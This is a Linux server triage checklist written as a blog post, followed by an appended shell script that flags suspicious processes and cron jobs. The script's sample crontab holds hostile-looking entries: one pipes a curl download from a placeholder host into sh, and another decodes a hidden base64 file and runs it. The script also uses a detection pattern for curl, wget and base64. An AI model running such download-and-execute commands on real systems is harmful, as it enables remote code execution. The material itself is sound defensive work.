
Faruk

Originally published at Medium

What I Check First When a Linux Server Starts Acting Suspicious | by Faruk Ahmed | May, 2025



✍️ Full Blog Content:

Intro:

Your server’s acting strange — maybe it’s lagging, maybe you’re seeing weird logs, or users are locked out. Before panic sets in, there’s a checklist I run through that helps me figure out what’s happening — fast. These are the first 7 things I check when a Linux server smells even a little bit wrong.

1. Who’s Logged In (Right Now)

who    # current sessions, with login time and source host
w      # same sessions, plus what each one is running right now

✅ Look for:

  • Users logged in that shouldn’t be
  • Multiple logins from odd IPs
  • Sessions active at strange hours

2. What Processes Are Running

ps aux --sort=-%cpu | head

✅ Watch for:

  • Shells or binaries running from /tmp or /dev/shm
  • Long-running scripts
  • Unusual process names (misspelled system commands)

3. Any New Cron Jobs?

# per-user crontabs (quiet on users that have none)
for user in $(cut -f1 -d: /etc/passwd); do crontab -l -u "$user" 2>/dev/null; done
# system-wide cron directories and spool
ls -l /etc/cron* /var/spool/cron

✅ Red flags:

  • Jobs calling curl, wget, or base64
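Steps 2 and 3 above turned into a small, reusable triage script. This is an added example, not code from the original post; the sample ps and crontab lines are constructed, and the helper names (flag_tmp_procs, flag_cron_downloaders) are my own.

```shell
#!/bin/sh
# Added example, not from the original post. On a live host, feed the helpers real output:
#   ps -eo pid,user,args --no-headers | flag_tmp_procs
#   crontab -l                        | flag_cron_downloaders
# Below they run over constructed sample lines so the script works offline.

# Step 2: print processes whose command path lives in /tmp or /dev/shm.
# Input lines look like "<pid> <user> <command> [args...]" (ps -eo pid,user,args).
flag_tmp_procs() {
    awk '$3 ~ "^(/tmp|/dev/shm)/" { print }'
}

# Step 3: print cron entries that call curl, wget or base64.
# Comment lines are skipped and the match is on whole words, so a binary
# merely named like "wgetter-report" is not flagged.
flag_cron_downloaders() {
    grep -v '^[[:space:]]*#' \
      | grep -E '(^|[^[:alnum:]_])(curl|wget|base64)([^[:alnum:]_]|$)'
}

# Constructed sample ps output (not captured from a real host).
SAMPLE_PS='1 root /sbin/init
812 www-data /usr/sbin/nginx -g daemon on;
2291 nobody /tmp/.x/kthreadd
2304 backup /dev/shm/update.sh
2310 faruk /usr/bin/vim notes.txt'

# Constructed sample crontab (not captured from a real host).
SAMPLE_CRON='# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -s http://example.invalid/a | sh
30 3 * * * /usr/bin/base64 -d /var/tmp/.p | sh
0 4 * * * /usr/bin/wgetter-report'

# Counters over the samples; each prints the number of flagged lines.
count_tmp_procs() { printf '%s\n' "$SAMPLE_PS" | flag_tmp_procs | wc -l | tr -d ' '; }
count_cron_hits() { printf '%s\n' "$SAMPLE_CRON" | flag_cron_downloaders | wc -l | tr -d ' '; }

echo "== processes running from /tmp or /dev/shm =="
printf '%s\n' "$SAMPLE_PS" | flag_tmp_procs
echo "== cron entries calling curl/wget/base64 =="
printf '%s\n' "$SAMPLE_CRON" | flag_cron_downloaders
```

A hit from either helper is a prompt to look closer (file ownership, mtime, what the script fetches), not proof of compromise on its own.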
